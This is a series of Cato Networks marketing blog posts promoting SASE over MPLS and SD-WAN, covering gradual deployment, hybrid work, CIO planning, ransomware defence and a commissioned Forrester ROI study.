How to Gradually Deploy SASE in an Enterprise
For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge) was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified, cloud-delivered service. Gartner predicts that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”
SASE converges networking and security into a single architecture that is:
Cloud-native
Globally distributed
Secure
Covers all edges
Enterprises can deploy SASE at the flip of a switch or gradually. In this blog post, we list five different gradual deployment use cases that enterprise IT can incorporate. For more detailed explanations, you can read the in-depth ebook that this blog post is based on, “SASE as a Gradual Deployment”.
Use Case #1: MPLS Migration to SD-WAN
SASE can support running MPLS alongside SD-WAN. In this first use case, enterprises leverage SASE’s SD-WAN functionalities, while turning off MPLS sites at their own schedule. Existing security and remote access solutions remain in place.
Use Case #2: Optimize Global Connectivity
SASE improves performance across global sites and WAN applications. Enterprises can use SASE for global connectivity and keep MPLS connections for critical WAN applications.
Use Case #3: Secure Branch Internet Access
SASE eliminates the need for edge security devices by delivering those capabilities, such as NGFW, IPS and ZTNA, as part of the service. In this use case, MPLS is augmented with SASE security.
Use Case #4: Cloud Acceleration and Control
SASE’s global network of PoPs (Points of Presence) optimizes traffic in the network and to cloud data centers. Enterprises can leverage SASE instead of relying on the erratic Internet.
Use Case #5: Remote Access
SASE optimizes and secures remote traffic. By replacing VPNs with SASE, enterprises can ensure remote access to all edges through a secure network of global PoPs.
Introducing Cato: The World’s First SASE Service
Cato is the world’s first SASE platform, which supports gradual migration while connecting all network resources, including branches, mobile, remote employees, data centers, and more. Through a global and secure cloud-native network, Cato also offers:
Managed threat detection and response
Event discovery
Intelligent last-mile management
Hands-free management
And much more
To learn more about MPLS to SASE deployment, read the ebook "SASE as a Gradual Deployment".
Your Post COVID Guide: Strategically Planning for the Hybrid Workforce
Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality.
For IT teams, this abrupt change was unexpected. As a result, organizations did not have the infrastructure in place required to support remote users. At first, IT teams tried to deal with the new situation by stacking up legacy VPN servers. But these appliances did not meet agility, security and scalability demands.
Now, organizations need to find a different strategic solution to enable a productive hybrid workforce that can adapt to future changes. In this blog post, we cover the three main requirements of such a strategic solution and our technological recommendations for answering them.
(For a more in-depth analysis, you can read the ebook “The Hybrid Workforce: Planning for the New Working Reality”, which this blog post is based on.)
Requirement #1: Seamless Transition Between Home and Office
Most traditional infrastructure, namely MPLS, SD-WAN and NGFW/UTM, is focused on the office. However, there is no infrastructure that extends to remote work and home environments. This extension is required to enable a remote workforce.
Solution #1: ZTNA and SASE
ZTNA (Zero Trust Network Access) and SASE (Secure Access Service Edge) decouple network and security capabilities from physical appliances. Instead, they provide them in the cloud. This solution converges all infrastructure into a single platform that is available to everyone, everywhere.
Requirement #2: Scalable and Globally Distributed Remote Access
Today’s VPNs are appliance-centric, making them resource-intensive when scaling and maintaining them.
Solution #2: Remote Access as a Service
A global cloud service can provide remote access to a significant user base. This will free up IT resources for infrastructure management.
Requirement #3: Optimization and Security for All Traffic
Having remote access is not enough. Teams also need traffic optimization and security for performance and preventing breaches.
Solution #3: A Single Solution for All Needs
Some remote access solutions include optimization and security for all traffic types. This can be done through WAN optimization, cloud acceleration and threat prevention.
A global and agile network and security infrastructure can serve your hybrid workforce and help you prepare for whatever is next. Read the ebook to learn how.
How to Succeed as a CIO in 100 Days
A CIO position is exciting but also challenging, especially if it’s your first role... And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use it to achieve professional success and establish your position as an invaluable business leader. (And, for more in-depth explanations, tips and stats, check out the e-book this blog post is based on.)
Phase 1: Get to Know the Organization and the Team (3 weeks)
The first step at a new company is to get to know the people and learn the company culture. Spend time with your team, stakeholders and company leadership. Use this opportunity to learn about the business, IT’s contribution and where IT fits in the business’s future goals. During these talks, map out any potential gaps or weaknesses you can identify.
To see example questions to ask during these sessions, check out the eBook.
Phase 2: Learn the IT and Security Infrastructure (3 weeks)
Once you’ve understood the expectations from your department, it’s time to learn the network infrastructure and architecture.
Take scope of:
Technologies in use
The delivery model
On-site and off-site work
Digital transformation status
Similar to phase one, start mapping out any network strengths and weaknesses.
Phase 3: Set a Strategy and Goals (2 weeks)
Finally, now is the time to determine your strategy for the upcoming year.
Organize your notes from phases 1 and 2.
Research new technologies, tools, trends and capabilities that could be relevant to your industry and requirements.
Map out your department’s strengths, weaknesses, threats and opportunities.
Determine your vision and mission statement.
Define your objectives.
Phase 4: Incorporate Digital Transformation (2 weeks)
According to McKinsey Global, following Covid-19, companies are accelerating digitization by three to seven years, acting even 40 times faster than expected! This means that CIOs who want to be perceived as future leaders need to keep up to date with digital technologies.
Look beyond traditional architectures and into trends like cloudification, convergence and mobility. According to Lars Norling, Director of IT Operations from ADB Safegate “Our analysis clearly showed the shift in the IT landscape, namely extended mobility and the move towards providing core services as cloud services. This led us to look outside of the box, beyond traditional WAN architectures.”
Gartner identifies SASE (Secure Access Service Edge) as the leading transformative technology today. SASE converges network and security into one global cloud service while reducing IT overhead, ensuring speed and performance and incorporating the latest security solutions.
Phase 5: Set Priorities (2 weeks)
Are you excited to get started on executing your plan? It’s almost time to do so. But first, prioritize the activities you want to take on, based on business requirements, ROI, urgency and risks.
The steps above are intended to help you make days 101 and onwards a smashing success. So go over your plans, take a deep breath and get started. Good luck!
To learn more about digital transformation and SASE, let’s talk.
Read more about your first 100 days in the ebook, “Your First 100 Days as CIO: 5 Steps to Success”.
What Others Won’t Tell You About MPLS
MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network.
5 Considerations for Evaluating MPLS and Its Alternatives
1. Agility: Can Your Network Move at the Speed of Business?
Modern enterprises need a solution that enables them to expand their business quickly and connect new sites to their existing networks. But traditional MPLS requires rolling out permanent infrastructure, which can take months and keeps businesses dependent on telco service and support.
2. Cost: Is Your Cost Per Megabit Too High?
The modern enterprise network is internet-bound, which makes it bandwidth-intensive. Enterprises need a solution that is priced in an internet-friendly manner since counting every megabit is counter-productive. But MPLS costs are megabit-based, and each megabit is pricey. Redundant circuits, resilient routing and WAN optimization drive the bill even higher.
3. Flexibility: Can The Business Transition Between On and Off-site Work?
New, post-pandemic workplaces have to be able to automatically transition between remote and on-site work. But in case of connectivity issues, transitioning to MPLS backups could cause significant delays that impede productivity.
4. Security: Can Enterprise Users Access Resources Anywhere?
To support remote work and a distributed workforce, resources, users, data and applications need to be secured wherever they are. But MPLS VPNs are hard to manage and backhauling traffic to the data centers adds latency, making the network vulnerable.
5. Management: Do You Have Visibility and Control of Your Network?
Modern businesses need co-managed networks so they can have visibility and control without having to take care of all the heavy lifting. But MPLS requires businesses to control the entire network or hand it all over to telcos.
Is SD-WAN the Solution for MPLS’s Shortcomings?
SD-WAN can replace some types of MPLS traffic, saving businesses from many of MPLS’ costs. However, SD-WAN doesn’t answer all business needs, including:
Cloud - SD-WAN focuses on physical WAN.
Security - SD-WAN employs only basic security features.
Remote and Hybrid Work - SD-WAN is a branch-oriented solution that cannot support remote work on its own.
Visibility - SD-WAN requires adding more vendors, which creates fragmented visibility.
How SASE Answers All Future WAN Needs
The solution for all future enterprise network needs is a converged solution that includes SD-WAN, a global backbone, pervasive security, and remote access in a single cloud offering.
A SASE platform offers just that:
A single platform for all capabilities, which can be activated separately at the flip of a switch.
A global WAN backbone over the cloud, ensuring traffic runs smoothly with minimal latency across global PoPs.
A unified security-as-a-service engine by converging ZTNA with SD-WAN.
A single pane of glass for all policies, configurations, monitoring, and analytics.
Flexible management - self-service, co-managed, or fully managed.
Read more about MPLS vs. SASE in the complete eBook, What Others Won’t Tell You About MPLS.
How to Protect from Ransomware with SASE
With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in addition to the immediate cost, which could reach millions of dollars, ransomware will also leave organizations with significant long-term damage. This blog post will explain the four main areas of impact of ransomware on organizations, and how Cato SASE Cloud can help prevent ransomware and protect businesses.
This blog post is based on the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”.
4 Ways Ransomware Affects Organizations
1. Immediate Loss of Productivity
Organizations depend almost entirely on data and applications for their daily operations, including making payments, creating products and delivering and shipping them. If this comes to a halt, the loss of productivity is enormous. For some global enterprises, this could even mean losing millions of dollars per hour. Recovering backups and attempting data recovery could take IT teams weeks of work. To restore productivity, some businesses prefer to pay the ransom and get operations back on track.
2. Data Encryption
According to Cybercrime Magazine, the global cost of ransomware damages will exceed $20 billion in 2021 and $265 Billion by 2031. One of the ways attackers gain these amounts is encrypting organizational data, and requiring a payment for instructions on how to decrypt it. To motivate victims to pay, attackers might threaten to destroy the private key after a certain amount of time, or increase the price as time passes.
To view the entire list and additional ways ransomware impacts organizations, check out the ebook.
How Cato SASE Cloud Prevents Ransomware
By converging network and security into a global, cloud-native service, Cato’s SASE platform provides visibility into traffic, edges and resources, which enables building a comprehensive and unique security solution that protects from malware while eliminating false positives.
Here are six ways Cato SASE Cloud protects organizations from ransomware:
1. Reputation Data & Threat Intelligence
Cato leverages threat intelligence feeds from open-source, shared communities and commercial providers. In addition, after finding that 30% of feeds contain false positives or miss IoCs, Cato built a complementing system that uses ML and AI to aggregate records and score them.
2. Blocking Command and Control Communication
Cato IPS prevents delivery of ransomware to machines, which is the primary way perpetrators gain hold of systems prior to the attack. If an attacker is already inside the network, Cato prevents the communication that attackers use to encrypt files and data.
3. Blocking Suspicious SMB File Activity
Cato IPS detects and blocks irregular network activity, which could be the result of attackers using SMB to rename or change extensions of encrypted files.
4. Zero Trust Network Access
Cato SASE Cloud provides a zero-trust approach to ensure users and hosts can only access applications and resources they are authorized for. This reduces the attack surface, limiting ransomware's ability to spread, encrypt and exfiltrate data.
5. Stopping Known and Zero-Day Threats
Leveraging machine learning, Cato’s advanced anti-malware solution defends against unknown threats and zero-day attacks, and is particularly useful against polymorphic malware designed to evade signature-based inspection engines.
6. An IPS that Sees the Full Picture, Not a Partial One
Cato’s IPS has unique capabilities across multiple security layers, including: layer-7 application awareness, user identity awareness, user/agent client fingerprint, true file type, target domain/IP reputation, traffic attributes, behavioral signature and heuristic, and more.
Scale Your Security Team with Cato MDR
Cato can offload the resource-intensive process of detecting compromised endpoints from organizations’ already-busy IT and security teams. This eliminates the need for additional installations as Cato already serves as the customer’s SASE platform, supplying unparalleled visibility into all traffic from all devices.
Automated Threat Hunting
Network-Level Threat Containment
Reporting & Tracking
Cato MDR service can help you identify and contain ransomware and suspicious activities before they activate and impact your business. Through lateral movement detection and baselining host behavior, Cato MDR service gives your network an extra set of eyes to detect, isolate and remediate threats. Contact us to learn more.
See the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”.
Renewing Your SD-WAN? Here’s What to Consider
The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective replacement for MPLS, enterprises need to make sure it answers their evolving needs, like cloud infrastructure, mitigating cyber risks, and enabling remote access from anywhere.
4 Things to Consider Before Renewing your SD-WAN Contract
Consideration #1: Security
Enterprises need to reduce their attack surface, ensuring that only required assets are accessible, and only to authorized users.
Questions to ask yourself:
Does my SD-WAN solution include advanced security models like ZTNA?
How does my SD-WAN’s security solution integrate with other point solutions?
Does my SD-WAN solution offer threat prevention and decryption?
Consideration #2: Cloud Optimization
Traffic from and to the cloud needs to be optimized in terms of performance and security.
Questions to ask yourself:
How does my SD-WAN solution manage multi-cloud environments?
Does my SD-WAN solution provide migration capabilities?
Can my SD-WAN solution scale according to my needs?
Consideration #3: Global Access
Enterprises need predictable and reliable transport to connect global locations to the cloud and data centers.
Questions to ask yourself:
Does my SD-WAN solution provide a global infrastructure to ensure low latency and optimized routing?
How does my SD-WAN solution ensure secure global access?
Will my SD-WAN solution provide an alternative in case of a network outage?
Consideration #4: Remote Access
Remote access for employees and external vendors needs to be supported to ensure business agility.
Questions to ask yourself:
How does my SD-WAN solution secure remote users?
How does my SD-WAN solution ensure remote users get optimized performance?
Does my SD-WAN solution protect from supply chain attacks?
SASE, the Next Step After SD-WAN
SASE (Secure Access Service Edge) provides value in areas where SD-WAN lacks. SASE is the next step after SD-WAN because it provides enterprises with all the point solutions’ advantages, but without the friction of integrating and maintaining them. SASE is a single platform that converges SD-WAN and network security into a single, cloud-native global service.
In fact, according to Gartner, by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020.
How SASE Answers Network and Security Requirements
Let’s see how SASE provides a solution for each of the considerations above.
Security – SASE’s converged, full security stack extends advanced and up-to-date security measures to all edges.
Cloud optimization – SASE provides frictionless and optimized cloud service with immediate scaling capabilities everywhere.
Global access – SASE PoPs deliver the service to users and locations that are nearest to them, as well as accelerating east-west and northbound traffic to the cloud.
Remote access – SASE delivers secure remote access, with the ability to instantly scale to address the new work-from-anywhere reality.
SD-WAN vs. SASE
After SD-WAN solves the branch-data center-edge challenge, SASE enables enterprises to globally expand their environment to the cloud in an optimized and secure manner.
Let’s see how the two compare:
How to Get Started with SASE
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now.
5 SD-WAN Gaps that are Answered by SASE
When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation. But today, enterprises have more advanced network and security needs, and IT leaders are realizing that SD-WAN doesn’t address them.
What’s the alternative? According to Gartner, it’s SASE (Secure Access Service Edge), an architecture that converges SD-WAN and security point solutions into a unified and cloud-native service. Gartner predicts that by 2024 more than 60% of SD-WAN customers will implement a SASE architecture.
This blog post will help you understand which SD-WAN gaps are answered by SASE, and how they are reconciled. To read the entire analysis, you can read the e-book.
SASE vs. SD-WAN for Enterprises
Let’s look at five network and security considerations modern enterprises have and how SD-WAN and SASE each respond to them.
1. Advanced Security
Enterprises today must prepare for cybersecurity attacks by implementing security solutions that will protect their critical applications. With SD-WAN, IT teams are required to add additional appliances, like NGFW, IPS and SWG. This increases the cost of deployments and complicates maintenance. SASE, on the other hand, has a built-in network security stack that secures all edges and all locations.
2. Remote Workforce
The hybrid work model is here to stay. Employees will continue to connect from home or other external locations, and third parties require access to the network as well. SD-WAN does not support this type of connectivity, since it was designed for replacing MPLS between physical locations. SASE, on the other hand, connects remote users from anywhere to the nearest PoP (point of presence), for optimized and secure access.
3. Cloud Readiness
Cloud connectivity is essential for business agility, global connectivity and access to business applications. SD-WAN is limited in cloud-readiness, and requires management and integration of proprietary appliances and expensive cloud connectivity solutions. SASE, on the other hand, is based on cloud datacenters that are connected to the SASE cloud. In addition, cloud applications don’t require integration and application traffic from edges is sent to cloud instances.
4. Global Performance
Global connectivity is the backbone of businesses, but SD-WAN provides connectivity through third-party backbone providers, which are not always reliable. SASE has a private global backbone that is WAN optimized.
5. Simple Management
Work has become more complicated and noisy than ever, so IT teams need a solution that will reduce overhead, not add to it. SD-WAN and security solutions require IT teams to manage, maintain and troubleshoot functions separately. SASE converges all functions, providing visibility and simple, centralized management.
Enterprises today need their IT and security to support and accelerate the development and delivery of new products, and to help them respond to business changes. SASE lowers business costs, complexity and risks by connecting network and security into a holistic platform.
To learn more about how SASE can replace SD-WAN and help IT teams prepare for the needs and opportunities of tomorrow, read the e-book. To get a consultation and understand how SASE can answer your specific needs, contact us.
The ROI of Doing Nothing: How and Why IT Teams Should Strategically Plan
In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need to adopt new technologies and discover new markets. To support these efforts, IT teams need to be prepared for digital change by making a strategic leap towards a network and security architecture that enables rapid and agile digital transformation. After all, today’s point solutions that only address cloud migration, remote work or certain security threats will only remain relevant for so long.
This blog post breaks down the considerations and requirements of strategic change, while comparing two courses of action - transforming early or waiting for the last minute - and proposes a plan for gradual adoption of SASE.
If you’d like to read a more in-depth breakdown of the process, with calculations and user testimonials, you’re welcome to view the e-book that this blog is based on.
5 Expected Network Demands in the Near Future
The first step to take when deciding how to address network changes is to understand what to expect, i.e., why IT teams even need to change course. Let’s look at five network demands IT teams will probably encounter in the (very) near future.
1. Accelerated Application Migration to the Cloud
As more teams require access to applications and infrastructure in the cloud, IT teams need to find ways to manage user and service access, deal with “Shadow IT” and enforce cloud policies from legacy networks. This is essential for ensuring secure connectivity and business continuity.
2. Rising MPLS Bandwidth Costs
MPLS is expensive and eats up a large portion of IT spend. As applications generate more traffic, video and data, costs are expected to go up even more. IT teams need to find a more cost-effective replacement, or get a higher budget.
3. Connecting Remote Workers
Remote and hybrid work are expected to stay long after Covid-19. But, ensuring performance, security and user experience for WFA users with traditional remote-access VPN is mission impossible for IT teams. This requires a long-term solution that is both stable and reliable.
4. Connecting the Supply Chain
The new workforce consists of contractors, consultants and other service providers that require network access. However, connecting these outsourced suppliers also creates security threats. IT teams need to find a solution that enables external collaboration without the risk.
5. Rapid Global Expansion
Organizations are growing and expanding, both organically and through acquisitions. Many times, expansion takes place into new geographies and locations. IT teams are required to integrate new employees and users as quickly and seamlessly as possible, within hours and days, not months.
New Networking Demands Create New Organizational Challenges
Now that we’ve listed these network challenges, let’s understand what they mean for IT teams, on an organizational level.
Upgrades and Replacements for Hardware Appliances - More users and traffic mean more required network bandwidth. Once existing appliances reach their limit, they will need to be updated, which is both expensive and time-consuming.
Increased Cost of Human Resources - Securing and managing applications and services requires human talent and time. This means training, hiring or off-loading to a third party.
The Telco Headache - Managing a relationship with a Telco can be frustrating and cause major overhead. As needs grow, it will become even more difficult to find the right person who will take responsibility, answer tickets and respond to requests in a timely manner.
The Solution: Build a Digital Strategy and Act On It
With so many complicated networking challenges on the horizon, the question isn’t whether to transform, only when. To answer this question, it’s important to have a strategy in place. This strategy will allow you to address future challenges with ease and expertise, while eliminating headaches. Let’s look at two ways to build and act on a digital strategy.
The Cost of Acting Now vs. Acting Later
Businesses today face two options. For simplicity, let’s divide them into two stages: 1 and 2.
Stage 1 businesses are those that spend a significant, yet manageable, amount of their budget on MPLS. In contrast, stage 2 companies spend an extremely large amount of money on MPLS, as new locations and workers that need to connect to cloud applications and locations are added to the network.
IT teams can transform technologically when businesses are either in stage 1 or stage 2. By transforming early, problems of digital transformation can be easily avoided. Instead of putting out fires, stage 1 companies have time to plan, think through issues and devise a strategy for today and tomorrow’s requirements.
Stage 2 companies, on the other hand, are in the worst position to make a transition. This is because the money, resources and time spent on legacy solutions will determine how much money, resources and time they will have for new challenges, impacting the success and ROI of the new solution. Putting out fires is the worst reason to make a strategic decision.
The SASE Solution To Rapid Digital Transformation
According to Gartner, “Current network strategy architectures were designed with the enterprise data center as the focal point for access needs. Digital business has driven new IT architectures like cloud and edge computing and work-from-anywhere initiatives, which have in turn, inverted access requirements, with more users, devices, applications, services and data located outside of an enterprise than inside. The Covid-19 pandemic accelerated these trends.”
The industry has rallied around Gartner’s SASE (Secure Access Service Edge) architecture as the best solution to meet the challenges introduced by cloud, mobility and other dynamically shifting network traffic (which we described above).
This is because SASE provides:
Access to any resource, including cloud applications and the Internet
A broad range of capabilities - NGFW, IPS, MDR and more
Scalability, without rigid constraints
5 Steps to SASE Adoption: Think Strategically While Acting Gradually
We’ve determined that the current network is the problem and that SASE is the solution. This raises the question: how can IT teams adopt SASE without disrupting the business?
SASE can be adopted gradually and grow incrementally as current MPLS contracts expire. Here are the five steps to take to enable digital transformation and prepare your network for “whatever’s next”:
Step 1: No Change - Deploy SD-WAN devices to connect certain sites to MPLS and the Internet. The rest of the network and MPLS connections remain unmodified.
Step 2: Complement MPLS - Deploy SASE where MPLS is unavailable or too expensive, to improve connectivity to WAN applications.
Step 3: Introduce Security - Deploy functions like NGFW, secure web gateways, IPS, anti-malware and zero trust as existing appliances reach end-of-life or can’t scale, or at new edges.
Step 4: Optimize Datacenter Access - Implement advanced routing to benefit SaaS applications instead of having them rely on the Internet, which is erratic.
Step 5: Connect Remote Users - Bring mobile and WFA users to the SASE cloud for optimized performance with ZTNA, while removing VPNs, servers, and other devices.
Conclusion: Time to Spring Into Action
Act now. You can start with a plan, a partial transition or testing, but don’t wait. By doing so, you will prevent:
High MPLS costs
Management overhead of siloed appliances and external services
Skyrocketing costs of complex MPLS networks
Constrained resources when MPLS costs rise
IT challenges to support network and security complexity
Slow and bulky networks that can’t meet digital transformation requirements
Low ROI following network and digital transformation
To learn more about the considerations and see a breakdown of transition costs and savings, access the ebook The ROI of Doing Nothing. To see how organizations can save money and achieve more than 200% ROI with Cato SASE Cloud, read the Forrester TEI (Total Economic Impact) Report.
Is SD-WAN Enough for Global Organizations?
SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However, SD-WAN also has some downsides, which modern organizations should take into consideration when choosing SD-WAN or planning its implementation.
This blog post lists the top considerations for enterprises that are evaluating and deploying SD-WAN. It is based on the e-book “The Dark Side of SD-WAN”.
Last Mile Considerations
SD-WAN provides organizations with flexibility and cost-efficiency compared to MPLS. For the last mile, SD-WAN users can choose their preferred service, be it MPLS or last-mile services like fiber, broadband, LTE/4G, or others.
When deciding which last-mile solution to choose, we recommend taking the following criteria into consideration:
Redundancy (to ensure availability)
Learn more about optimizing the last mile.
Middle Mile Considerations
MPLS provides predictability and stability throughout the middle mile. When designing the SD-WAN middle mile, organizations need to find a solution that provides the same capabilities.
Relying on the Internet is not recommended, since it is unpredictable. Its routers are stateless and control plane intelligence is limited, which means routing decisions aren’t based on application requirements or current network conditions. Instead, providers’ commercial preferences often take priority.
Learn more about reliable global connectivity.
Distributed architectures require security solutions that can support multiple edges and datacenters. The four main options enterprises have today are:
The SD-WAN Firewall
- Built into the SD-WAN appliance
- Does not inspect user traffic
Purchasing a Unified Threat Management Device
- Inspects user traffic
- Requires a device for each location, which is costly and complex
- Eliminates firewalls at every edge
- Based on multiple devices - the datacenter firewall, the SD-WAN and the cloud security device. This is also costly and complex.
A Converged Solution
- SASE (Secure Access Service Edge) - converges SD-WAN at the edge and security in the middle, with a single location for policy management and analytics.
Cloud Access Optimization Considerations
In a modern network, external datacenters and cloud applications need to be accessed by the organization’s users, branches and datacenters. Relying on the Internet is too risky in terms of performance and availability.
It is recommended to choose a solution that offers premium connectivity or to choose a cloud network that egresses traffic from edges as close as possible to the target cloud instance.
Network Monitoring Considerations
When monitoring the network, enterprises need to be able to identify issues in a timely manner, open tickets with ISPs and work with them until the issue is resolved.
It is recommended to set up 24/7 support and monitoring to orchestrate this and prevent outages that could impact the business.
Considerations When Managing the SD-WAN
Transitioning to SD-WAN requires deciding how to manage relationships with all the last-mile ISPs, as well as the network itself. You can manage these internally or outsource to providers.
Ask yourself the following questions:
Is it easier to manage multiple providers directly or through a single external aggregator?
How much control do you need over deployment and integrations?
What are your priorities for your internal talent’s time and resources?
Organizations today need to shift to support the growing use of cloud-based applications and mobile users. SD-WAN is considered a viable option by many. But is it enough? Use this blog post to evaluate if and how to implement SD-WAN. To get more details, read the complete e-book.
To learn more about SASE, let’s talk.
Total Economic Impact™ Study: Cato Delivers 246% ROI and $4.33 Million NPV
Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud-native architecture that eliminates the complexity, costs and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture without any effort from the IT teams.
The question was whether we were living up to that goal.
To help us and our potential customers gauge the potential impact and ROI of Cato Networks, we commissioned Forrester Consulting to conduct a Total Economic Impact (TEI) study. To be honest, even we were surprised by the success companies achieved through the Cato SASE Cloud.
The study shows how Cato Networks helps reduce costs, eliminate overhead, retire old systems, strengthen security, improve performance and build higher employee morale.
According to Forrester Consulting’s key findings, a composite organization using Cato can gain the following benefits:
$4.33 million NPV
Payback within 6 months
$3.8 million saved through reduced operation and maintenance
Almost $44,000 saved by reducing the time to configure Cato on new sites
$2.2 million saved by retiring systems that Cato replaces
Reduced time and transit cost
These results matter because organizations today struggle to manage security and network services. They have dedicated teams for VPN, Internet, WAN and more, and these teams have to manage updates individually at each network site. This consumes a great deal of time and money. In the long run, it becomes difficult for the business to transform digitally, maintain a competitive advantage and deliver the best service to its customers.
Let’s look at the key findings in more depth.
Reduced Operation and Maintenance Costs
The study found that using Cato Networks saves $3.8 million in reduced operation and maintenance costs over three years. This objective is extremely important to stakeholders across organizations, because network and security engineers spend a lot of time managing systems instead of optimizing them.
“Honestly, I was shocked to see how easy it was to set up and maintain an SD-WAN solution based on the whole Cato dashboard. With the previous solution, there’s a saying that you need 10 engineers to set it up and 20 engineers to keep it running. With Cato, all of those worries went away. The secret is the dashboard. Within an hour, you understand the idea behind it and then you can just do it.”
- IT Manager, automotive parts manufacturer
Reduced Configuration Time
As businesses expand and need the flexibility to connect employees and customers anywhere, setup and configuration time has become an important consideration when choosing network and security solutions. According to the study, Cato Networks saves almost $44,000 over three years, along with a great deal of the staff’s time.
“We were also pushing another effort. With mergers, expansion into various regions and frequent office moves, we needed an ‘office in a box’. We needed a fire-and-forget type of management-plane separation approach, where our team would simply ship the ‘box’, a reasonably capable individual would connect it by following the diagram, bring up the management portal and get to work right away.”
- Director of Technology, Advisory, Tax and Assurance
Savings from Retiring Systems
Expensive hardware is a serious problem for IT and security teams, because it needs maintenance, upgrades, fixes and integration with other platforms. By migrating to SASE and retiring existing systems, organizations can save $2.2 million over three years with Cato.
“We don’t need to invest in other solutions because everything we need to do is done in the Cato transport, with its intelligence and security layers.”
- Director of Technology, Advisory, Tax and Assurance
According to the report, Cato Networks also delivers the following additional benefits that cannot be quantified:
Reduced time and transit cost - saves the time and cost of shipping equipment to remote sites.
Stronger security posture - ensures a consistent security rule set across the organization.
Improved application performance - helps practitioners complete their work faster.
Higher employee morale - the Director of Technology, Advisory, Tax and Assurance said: “We know very well that when the company tries to deploy things itself, employees push back because of the time the work requires. Engineers really like the solution because everything is simple: ship it, configure it and it runs right away.”
Flexibility - new mobile users can be added and sites deployed quickly, without the need to add infrastructure.
Read the Full Report
To learn more about how businesses transform digitally with Cato Networks, read the full report. It contains all the financial details, additional quotes and use cases, and a breakdown of costs and savings, so you can gain a deeper understanding of Cato Networks’ business impact. Click here to read the report.
8 Reasons Enterprises are Adopting SASE Globally
SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions, SASE provides a unified, global and cloud-based network that supports all edges. As a result, SASE solutions improve organizational performance, business agility and connectivity. They also reduce IT overhead.
Ever since SASE was coined as a category by Gartner in 2019, the global adoption of SASE has grown significantly. Here are eight drivers and global trends that are driving this change.
This blog post is based on the e-book “8 SASE Drivers for Modern Enterprises”.
8 SASE Drivers for Modern Enterprises
1. Enabling the “Branch Office of One”
Thanks to mobile devices and constant connectivity, employees can stay connected at all times and work from anywhere. This has turned them into a “branch office of one”, i.e., a fully functional business unit consisting of one person.
The remote working trend has been intensified by COVID-19, which has significantly accelerated its adoption. Some form of working from home is probably here to stay. McKinsey found that 52% of employees would prefer a flexible working model even after COVID.
Therefore, IT and security teams are adopting SASE solutions to enable these “branches of one” to work seamlessly and securely. SASE optimizes traffic to any edge while continuously inspecting traffic for threats and access control. This ensures all employees anywhere are productive, can access all company assets and can communicate with all employees and partners, at all times.
2. Direct-to-Internet Branch Access
Traditional branch offices are also evolving. Many employees have a constant need to communicate with others across the world and to connect to global cloud infrastructures, platforms and applications. So while these employees might be sitting together physically, they are de facto a collection of branch offices of one, with intensive communication and security requirements.
IT and security teams are implementing SASE solutions to provide high-performance connectivity to the cloud for these employees. SASE provides SD-WAN capabilities and a global private backbone that replaces the costly MPLS and the erratic Internet.
3. Consolidating Vendors
The growing number of network and security requirements has flooded the market with vendors and point solutions. IT and security teams are having a difficult time figuring out which platform can answer their exact needs, both now and in the future. In addition, integrating and managing all these solutions creates time-consuming complexities and overhead.
SASE is being adopted as a single, user-friendly converged solution for all network and security needs, now and in the future. A single console for configuration, management and reporting improves visibility and management capabilities. In addition, implementing one security solution makes it possible to enforce a single set of policies across the entire network, reducing the attack surface.
4. Adopting Zero Trust
Zero trust is a security model in which users are continuously authenticated before they are given access to assets or apps. It is based on the premise of “never trust, always verify”, to ensure the principle of least privilege is enforced and attackers can’t gain access to sensitive assets. Zero trust is essential for securing a global, dispersed workforce that connects remotely and not from the physical, enterprise network.
The mindset of IT and security teams is shifting, from securing physical locations to connecting and securing users and devices. Zero trust is deployed as part of SASE as a solution to access needs. By using simple mobile client software or clientless browser access, users connect dynamically to the closest SASE PoP, where their traffic is routed optimally to the data center or application. There, it is authenticated before providing access.
Check out the full ebook to view the entire list and four additional SASE drivers.
The Future of Enterprise Networks
Agile solutions that provide secure, global access with high performance are driving global digital transformation. It is becoming evident, however, that point solutions can't meet all the enterprise needs. These changes are driving the adoption of SASE, a convergence of network and security functions that drives traffic through a global network of local PoPs.
With SASE, traffic is sent to the local SASE PoP. Once traffic enters the PoP, SASE applies network and security policies and forwards it over an optimized, global, private backbone. The SASE cloud service takes care of delivering and managing a comprehensive security stack, including upgrades and security updates, for all connected users and cloud resources.
The result is optimized, secure and high performing traffic that drives business agility.
Cato Networks is Driving SASE Globally
